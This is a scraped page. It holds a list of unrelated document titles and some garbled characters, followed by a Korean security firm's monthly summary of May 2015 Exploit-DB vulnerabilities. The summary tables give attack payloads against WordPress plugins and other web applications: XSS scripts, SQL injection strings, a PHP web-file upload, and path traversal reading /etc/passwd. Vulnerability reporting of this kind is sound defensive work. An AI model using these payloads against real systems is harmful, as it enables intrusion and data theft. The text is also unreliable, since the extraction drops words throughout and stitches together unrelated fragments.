3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

Similar documents
76 XSS 하 Huge-IT Slider admin.php XSS

EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

105È£4fš

¿¡À̽º ÃÖÁ¾¿ø°í

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

Sena Device Server Serial/IP TM Version

6강.hwp

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

HTML5* Web Development to the next level HTML5 ~= HTML + CSS + JS API

Secure Programming Lecture1 : Introduction

Microsoft Word - KSR2014S042

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

Observational Determinism for Concurrent Program Security

PowerPoint プレゼンテーション

<4D F736F F F696E74202D E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA E >

내지무인화_

ODS-FM1

User Guide

..,. Job Flow,. PC,.., (Drag & Drop),.,. PC,, Windows PC Mac,.,.,. NAS(Network Attached Storage),,,., Amazon Web Services*.,, (redundancy), SSL.,. * A

untitled

BH의 안드로이드 추천 어플

<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

Supplier_Connect_User_Guide_Korean

1

UNIST_교원 홈페이지 관리자_Manual_V1.0

목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항

로거 자료실

PowerPoint 프레젠테이션

Connection 8 22 UniSQLConnection / / 9 3 UniSQL OID SET

Remote UI Guide

PowerPoint 프레젠테이션

PowerPoint Template

PowerPoint Template

PowerPoint 프레젠테이션

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

1. 배경 업무 내용이나 개인정보가 담긴 청구서 등을 메일로 전달 시 중요한 정보가 유출되는 경우가 발생하고 있으며, 이에 따른 메일 암호화 솔루션을 도입하고 있으나 기존 ActiveX를 기반으로 한 플러그인 방식은 여러 가지 제약으로 인해 사용성이 저하되고, 고객 대

Microsoft Word - junior.docx

SNC-WR630/WR632/WR600/WR602

제목 레이아웃

YBM시사닷컴, 첨단 개인별 맞춤 학습 시스템 개발

untitled

untitled

PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (

chapter1,2.doc

본 기기에 대하여 언제, 어디서나 자유롭게 LG 넷하드를 구입해주셔서 감사합니다. LG 넷하드는 인터넷이 연결된 곳이라면 언제 어디서나 자유롭게 파일을 저장하고 공유할 수 있는 장치입니다. 2

Microsoft PowerPoint - web-part03-ch19-node.js기본.pptx

User's Guide Manual

CLX8380_KR.book

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

Analyst Briefing

Inside Android Applications

goyong1003_36p

USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl C

2

Facebook API

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

초보자를 위한 C++

0125_ 워크샵 발표자료_완성.key

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

FileMaker 15 WebDirect 설명서

untitled

PowerPoint Presentation

3장

컴퓨터과학과 교육목표 컴퓨터과학과의 컴퓨터과학 프로그램은 해당분야 에서 학문적 기술을 창의적으로 연구하고 산업적 기술을 주도적으로 개발하는 우수한 인력을 양성 함과 동시에 직업적 도덕적 책임의식을 갖는 IT인 육성을 교육목표로 한다. 1. 전공 기본 지식을 체계적으로

Windows Live Hotmail Custom Domains Korea

2파트-07

커버컨텐츠

Special Theme _ 모바일웹과 스마트폰 본 고에서는 모바일웹에서의 단말 API인 W3C DAP (Device API and Policy) 의 표준 개발 현황에 대해서 살펴보고 관 련하여 개발 중인 사례를 통하여 이해를 돕고자 한다. 2. 웹 애플리케이션과 네이

PowerPoint 프레젠테이션

*º¹ÁöÁöµµµµÅ¥-¸Ô2Ä)

슬라이드 제목 없음

VOL /2 Technical SmartPlant Materials - Document Management SmartPlant Materials에서 기본적인 Document를 관리하고자 할 때 필요한 세팅, 파일 업로드 방법 그리고 Path Type인 Ph

20주년용

기업 단체 교육 비영리단체 사용자에게 최적인 소프트웨어 도입 프로그램 FileMaker 볼륨 라이선스 Version 15 May 2016

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

PowerSHAPE 따라하기 Calculate 버튼을 클릭한다. Close 버튼을 눌러 미러 릴리프 페이지를 닫는다. D 화면을 보기 위하여 F 키를 누른다. - 모델이 다음과 같이 보이게 될 것이다. 열매 만들기 Shape Editor를 이용하여 열매를 만들어 보도록

10.ppt

슬라이드 1

제목을 입력하세요.

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

초보자를 위한 ASP.NET 21일 완성

server name>/arcgis/rest/services server name>/<web adaptor name>/rest/services ArcGIS 10.1 for Server System requirements - 지

Transcription:

분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (205.05) 205.05.0~205.05.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 205 년 5 월에공개된 Exploit-DB 의분석결과, XSS (Cross Site Scripting) 공격에대한보고개수가가장많았습니다. 분석된 XSS 공격들은모두스크립트를파라미터에삽입하는단순한공격으로써, 기본적인입력값및특수문자를체크하였다면충분히막을수있는공격들이었습니다. 주요소프트웨어별발생현황을보면, 4 월과마찬가지로대표적인 CMS 인 에서가장많은이보고되었습니다. 사용자수가많고 Plugin 도다양하게제공되는 는그만큼해커들의주요공격대상이되므로 를사용하는관리자는항상최신의보안업데이트상태를유지하는것이필요합니다. 다음으로는 소프트웨어에서많은이보고되었습니다. 위험도가낮은들이발견되었지만 PHPMyAdmin 의 JSP 버전인 JSPMyadmin 역시사용자가많은소프트웨어이기때문에, 주기적인보안패치를실시하여공격위험을최소화할수있도록노력하여야하겠습니다.. 별보고개수 보고개수 XSS 7 5 LFI 3 File Upload 총합계 36 40 35 30 25 20 5 0 5 0 별보고개수 36 7 5 3 XSS LFI File Upload 총합계 2. 위험도별분류위험도 보고개수 백분율 상 4.% 중 32 88.89% 하 0 0.00% 합계 36 00.00% 위험도별분류 4 상 중 32 3. 공격난이도별현황공격난이도 보고개수 백분율 상 0 0.00% 중 3 8.33% 하 33 9.67% 총합계 36 00.00% 공격난이도별현황 3 중 하 33 4. 주요소프트웨어별발생현황소프트웨어이름 SynTail Xeams Buddy Wing FTP Server Admin Pluck PHPCollab Chronosite 총합계 보고개수 20 5 2 36 2 주요소프트웨어별발생현황 5 20 SynTail Xeams Buddy Wing FTP Server Admin Pluck ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 36907 XSS 하 중 Ultimate Product Catalogue 3..2 - admin.php XSS 36907 File Upload 하 상 Ultimate Product Catalogue 3..2 - admin.php File Upload 36942 하 중 Freshmail Plugin <=.5.8 - post.php 36930 하 중 Freshmail Unauthenticated - admin-ajax.php 36959 XSS 하 중 ClickBank Ads Plugin.7 - clickbank-ads.php XSS 36958 XSS 하 중 Ultimate Profile Builder Plugin 2.3.3 - admin.php XSS 36954 XSS 하 중 Yet Another Related Posts Plugin <= 4.2.4 - options-general.php XSS 37003 Booking Calendar Contact Form.0.2 - /wp-path/wp-admin/ 하중 37003 Booking Calendar Contact Form.0.2 - admin-ajax.php 취약하중 점 37003 하 중 Booking Calendar Contact Form.0.2 - /wp-path/ 37067 중 상 Feed Plugin 205.0426 - admin.php 37080 하 중 WP Symposium Plugin 5. - / 373 Wordpess Simple Photo Gallery.7.8 - 중상 /index.php/wppg_photogallery/wppg_photo_details/ 372 XSS 하 중 church_admin Plugin 0.800 - /wordpress/index.php/205/05/2/church_admin-registration-form/ XSS 3709 하 중 GigPress Plugin 2.3.8 - gigpress.php

3708 하 중 Landing Pages Plugin.8.4 - post.php 3708 XSS 하 중 Landing Pages Plugin.8.4 - post-new.php 3707 하 중 NewStatPress Plugin 0.9.8 - admin.php 3707 XSS 하 중 NewStatPress Plugin 0.9.8 - admin.php XSS 3732 XSS 하 중 Plugin Free Counter. - admin-ajax.php XSS

EDB 분석보고서 (205.05) 205.05.0~205.05.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 205-05-04 36907 XSS 하중 Ultimate Product Catalogue 3..2 - admin.php XSS POST /wp-admin/admin.php?page=upcpoptions&action=upcp_editproduct&update_item=produc t&item_id=6 HTTP/. Chrome/6.0.92.75 Safari/535.7 action=edit_product&_wp_http_referer=/wpadmin/admin.php?page=upcpoptions&action=upcp_editproduct&update_item=produc t&item_id=6&item_name=product name</a><script>alert('product Name says: '+document.cookie)</script><a>&item_slug=asdf&item_id =6&Item_Image=http://i.imgur.com/6cWKujq.gif&Item_P rice=666&item_description=product description says<script>alert('product description says: '+document.cookie)</script>&item_seo_description=seo desc&item_link=&item_display_status=show&category_i D=&SubCategory_ID= Ultimate Product Catalogue 3..2 205-05-04 36907 File Upload 하상 Ultimate Product Catalogue 3..2 - admin.php File Upload POST /wp-admin/admin.php?page=upcpoptions&action=upcp_addproductspreadsheet&displaypa ge=product HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd0029908f2 Ultimate Product Catalogue 3..2 -----------------------------7dd0029908f2 Content-Disposition: form-data; name="uploadfile"; filename="cooldog.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd0029908f2-- POST /wp-admin/post.php HTTP/. 205-05-07 36942 하중 Freshmail Plugin <=.5.8 - post.php Chrome/6.0.92.75 Safari/535.7 Freshmail Plugin <=.5.8 content=[fm_form id='" and substr(user(),,)="b] POST wp-admin/admin-ajax.php HTTP/. 205-05-07 36930 하중 Freshmail Unauthenticated - adminajax.php Chrome/6.0.92.75 Safari/535.7 Freshmail <=3D.5.8 form%5bemail%5d=3dfake@fake.com&form%5bimie%5d =3Dasdf&fm_form_id=3D" and "a"=3d"a&action=3dfm_form&fm_form_referer=3d%2f 205-05-08 36959 XSS 하중 POST /wp/wp-admin/optionsgeneral.php?page=clickbank-ads-clickbankwidget/clickbank-ads.php HTTP/. ClickBank Ads Plugin.7 - clickbank-ads.php XSS 취약 Chrome/6.0.92.75 Safari/535.7 점 ClickBank Ads Plugin.7 cbwec[title]=">>><script>+-+--+- +alert(document.cookie)</script>

EDB 분석보고서 (205.05) 205.05.0~205.05.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 205-05-08 36958 XSS 하중 POST /wp/wp-admin/admin.php?page=ultimatepb_field HTTP/. Ultimate Profile Builder Plugin 2.3.3 - admin.php Chrome/6.0.92.75 Safari/535.7 XSS field_name=<script>alert("")</script> Ultimate Profile Builder Plugin 2.3.3 205-05-08 36954 XSS 하중 Yet Another Related Posts Plugin <= 4.2.4 - optionsgeneral.php XSS POST /wp/wp-admin/admin.php?page=ultimatepb_field HTTP/. Chrome/6.0.92.75 Safari/535.7 Yet Another Related Posts Plugin <= 4.2.4 no_results=<script>alert();</script> 205-05-08 36953 XSS 하중 SynTail <=.5 Build 566 - /app XSS POST /app HTTP/. Chrome/6.0.92.75 Safari/535.7 SynTail SynTail <=.5 Build 566 friendlyname=<script>alert("marlow")</script> 205-05-08 3695 XSS 하중 SynaMan <= 3.4 Build 436 - /app XSS /app?sharedname=%3cscript%3ealert%28%22xss%22 %29%3C%2Fscript%3E&selectedPath=C%3A\&publicR ead=&publicwrite=&operation=mngfolders&st=addfol der SynaMan SynaMan <= 3.4 Build 436 205-05-08 36950 XSS 하중 Syncrify Server <= 3.6 Build 833 - /app XSS /app?adminemail=%3cscript%3ealert%28victim%29% 3C%2Fscript%3E&smtpServer=27.0.0.&smtpPort=25&s mtpuser=%3cscript%3ealert%284%29%3c%2fscript% 3E&smtpPassword=admin&smtpSecurity=None&proceedB utton=save&operation=config&st=savesmtp Syncrify Syncrify Server <= 3.6 Build 833 205-05-08 36949 XSS 하중 Xeams <= 4.5 Build 5755 - / XSS /FrontController?domainname=%3Cscript%3Ealert%28 %22XSS%22%29%3C%2Fscript%3E&operation=60 Xeams Xeams <= 4.5 Build 5755 205-05- 36993 LFI 하중 Buddy.3.3 - /sqlbuddy/ LFI /sqlbuddy/#page=../../../restricted/user_pwd.sql# Buddy Buddy.3.3 205-05- 36992 XSS 하중 Wing FTP Server Admin <= 4.4.5 - /admin_loglist.html XSS /admin_loglist.html?domain=<script>alert();</script> Wing FTP Server Admin Wing FTP Server Admin <= 4.4.5 205-05- 36990 LFI 하중 205-05- 36989 중상 205-05- 36986 LFI 하중 3.6.5 - view_file.php LFI 3.6.5 - new_sidebar.php /www/view_file.php?action=download&file=../../../../../../ etc/passwd/ /www/new_sidebar.php?sbctg=lessons&new_lesson_id=n ull+union+select+password+from+users+where+id= /pluck- Pluck 4.7-4_7/data/modules/albums/albums_getimage.php?image= albums_getimage.php LFI \..\..\..\..\..\..\..\Windows\system.ini 3.6.5 3.6.5 Pluck Pluck 4.7 205-05-3 37004 하중 205-05-3 37003 하중 PHPCollab 2.5 - deletetopics.php Booking Calendar Contact Form.0.2 - /wppath/wp-admin/ /phpcollab/topics/deletetopics.php?project=%27%20and %20%27a%27%3D%27a%27 /wp-path/wpadmin/?action=dex_bccf_check_posted_data&dex_bccf=l oadseasonprices&dex_item=%20union%20select%20nu ll,%20null PHPCollab PHPCollab 2.5 Booking Calendar Contact Form.0.2 205-05-3 37003 하중 Booking Calendar Contact Form.0.2 - adminajax.php POST /wp-path/wp-admin/adminajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_ calendar_load2=delete HTTP/. Chrome/6.0.92.75 Safari/535.7 Booking Calendar Contact Form.0.2 id='%20or%20sleep(00)# 205-05-3 37003 하중 Booking Calendar Contact Form.0.2 - /wp-path/ POST /wppath/?action=dex_bccf_check_posted_data&dex_bccf=get cost HTTP/. Chrome/6.0.92.75 Safari/535.7 Booking Calendar Contact Form.0.2 dex_item=%20union%20select%20null,%20null

EDB 분석보고서 (205.05) 205.05.0~205.05.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 205-05-8 37050 하중 Chronosite 5.2 - archives.php /cms/chronosite_52/archives.php?numero=%27%20and %20%27a%27%3D%27a%27 Chronosite Chronosite 5.2 205-05-20 37067 중상 Feed Plugin 205.0426 - admin.php /wpadmin/admin.php?page=feedwordpress/syndication.php& action=update Checked&link_ids[]=) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,CONCAT(0x76a6b6a7,0x707653577975 544373,0x7787627)-- FeedWordPre ss Plugin 205.0426 205-05-2 37080 하중 205-05-26 373 중상 WP Symposium Plugin 5. - / Wordpess Simple Photo Gallery.7.8 - /index.php/wppg_photogallery/ wppg_photo_details/ /?page_id=4&cid=&show=%20and%20= /wordpress/index.php/wppg_photogallery/wppg_photo_d etails/?gallery_id= AND (SELECT * FROM (SELECT(SLEEP(5)))QBzh)&image_id=4 WP Symposium Plugin 5. Wordpess Simple Photo Gallery.7.8 POST /wordpress/index.php/205/05/2/church_adminregistration-form/ HTTP/. Chrome/6.0.92.75 Safari/535.7 205-05-26 372 XSS 하중 save=yes&church_admin_register=9d8cf0420&_wp_http _referer=%2fwordpress%2findex.php%2f205%2f05% church_admin Plugin 2F2%2Fchurch_admin-registrationform%2F&first_name%5B%5D=test&prefix%5B%5D=&l 0.800 - /wordpress/index.php/205/05/ ast_name%5b%5d=test&mobile%5b%5d=%2b3670&p 2/church_admin-registrationform/ XSS eople_type_id%5b%5d=&email%5b%5d=test%40test. test&sex=male&phone=%2b3670&address=%3cscript %3Econfirm%28%29%3C%2Fscript%3E&lat=5.5035 29583287&lng=- 0.4893359375&recaptcha_challenge_field=03AHJ_Vuv BRBOVts65lchUe_H_cAuISniJ4rFDcaPyecjg- HypsHSZSfTkCyZMUC6PjVQAkkuFDfpnsKn28LU8wIMxb9n F5g7XnIYLt0qGzhXcgX4LSX5ul7tPX3RSdussMajZ- _NYQnOMJZj8b5e5LJgK68Gjf8aaILIyxKud2OF2bmzoZKa 56gtjBbzXBEGASVMMFJ59uB9FsoJIzVRyMJmaXbbrgM0 jnsseegthefo83fuzs9uuqrbqgqazgymmtwdgz4xvrzxudv5zc76 ktq-lwkpa&recaptcha_response_field=34 church_admin Plugin 0.800 205-05-26 3709 하중 GigPress Plugin 2.3.8 - gigpress.php POST /wp-admin/admin.php?page=gigpress/gigpress.php HTTP/. Chrome/6.0.92.75 Safari/535.7 GigPress Plugin 2.3.8 _wpnonce=b3c92d92&_wp_http_referer=/wordpress/w p- admin/admin.php?page=gigpress/gigpress.php&gpaction =add&show_status=active&gp_mm=05&gp_dd=05&gp_y y=205&show_artist_id= and =&show_venue_id=&show_related=new 205-05-26 3708 하중 Landing Pages Plugin.8.4 - post.php /wpadmin/post.php?post=306%20and%20=&action=edit &lp-variation-id=&ab-action=delete-variation Landing Pages Plugin.8.4 205-05-26 3708 XSS 하중 Landing Pages Plugin.8.4 - post-new.php /wp-admin/post-new.php?post_type=inboundforms&post='></iframe><script>alert(string.fromcharcode (88, 83, 83))</script> Landing Pages Plugin.8.4 205-05-26 3707 하 중 205-05-26 3707 XSS 하 중 NewStatPress Plugin 0.9.8 - admin.php NewStatPress Plugin 0.9.8 - admin.php XSS /wpadmin/admin.php?where=agent%20and%20'a'='a'&lim itquery=&searchsubmit=buscar&page=nsp_search /wpadmin/admin.php?where=<script>alert(string.fromcharc ode(88,+83,+83))</script>&searchsubmit=buscar&page=n sp_search NewStatPress Plugin 0.9.8 NewStatPress Plugin 0.9.8 205-05-27 3732 XSS 하중 POST /wp-admin/admin-ajax.php HTTP/. Chrome/6.0.92.75 Safari/535.7 Plugin Free Counter. - admin-ajax.php XSS Plugin Free Counter. action=check_stat&id_counter=<counter_id from step 2>&value_=<script>alert()</script> 205-05-29 3752 하중 SPMyAdmin. - deletedata.jsp //deletedata.jsp?db=test&table=email&field= CATID or 'field'='name'.

EDB 분석보고서 (205.05) 205.05.0~205.05.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 205-05-29 3752 XSS 하중 SPMyAdmin. - right.jsp XSS //right.jsp?server=localhost&db= "/><script>alert(666)</script>. 205-05-29 3752 XSS 하중 SPMyAdmin. - tabledata.jsp XSS //tabledata.jsp?db= "/><script>alert(666);</script>. 205-05-29 3752 XSS 하중 SPMyAdmin. - query.jsp XSS //query.jsp?server= "/><script>alert(666)</script>&db=. 205-05-29 3752 XSS 하중 SPMyAdmin. - export.jsp XSS //export.jsp?db=test&table= <script>alert(666)</script>.